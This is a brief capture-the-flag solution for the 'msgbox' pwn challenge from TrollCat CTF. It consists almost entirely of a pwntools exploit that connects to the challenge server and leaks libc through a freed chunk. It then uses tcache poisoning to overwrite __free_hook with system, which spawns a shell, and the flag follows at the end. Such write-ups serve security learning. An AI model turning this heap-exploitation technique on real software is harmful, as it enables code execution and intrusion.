TrollCat CTF: msgbox [pwn, 499 points]

More secure than “Whatsapp”

I’m starting to get the hang of tcache poisoning, detailed writeup to come later.

from pwn import *

#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./vuln', checksec = False)
libc = ELF('./libc.so.6', checksec = False)

#p = process('./vuln', env = {'LD_PRELOAD' : libc.path})
p = remote("157.230.33.195", 2222)
print(p.recvuntil('> '))

#: GDB SETTINGS
breakpoints = ['break *0x400b53', 'break *0x400c9b', 'break *0x400d6e']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))

#: EXPLOIT INTERACTION STUFF
def alloc_chunk(size, index, data):

	p.sendline('1')
	p.sendline(str(size))
	p.sendline(str(index))
	p.sendline(data)
	print(p.recvuntil('> '))

def show_chunk(index, leak = False):

	if leak:
		p.sendline('2')
		p.sendline(str(index))
		return u64(p.recvuntil('> ').split()[3].ljust(8, '\x00'))
	else:
		p.sendline('2')
		p.sendline(str(index))
		print(p.recvuntil('> '))

def free_chunk(index):

	p.sendline('3')
	p.sendline(str(index))
	print(p.recvuntil('> '))

def edit_chunk(index, data):

	p.sendline('4')
	p.sendline(str(index))
	p.sendline(data)
	print(p.recvuntil('> '))

#: PWN THY VULNS
alloc_chunk(0x410, 0, 'A' * (0x410-1))
alloc_chunk(0x10, 1, 'B' * (0x10 - 1))

free_chunk(0)
edit_chunk(0, '1111222')

leak = show_chunk(0, leak = True)
libc_base = leak - 0x3ebca0

log.info(hex(leak))
log.info(hex(libc_base))

#: tcache poison
free_chunk(1)
edit_chunk(1, p64(libc_base + libc.symbols['__free_hook']))

alloc_chunk(0x10, 3, '/bin/sh\x00')
alloc_chunk(0x10, 4, p64(libc_base + libc.symbols['system']))

p.interactive()
#: Trollcat{h34p_h34p_g0_4w4y}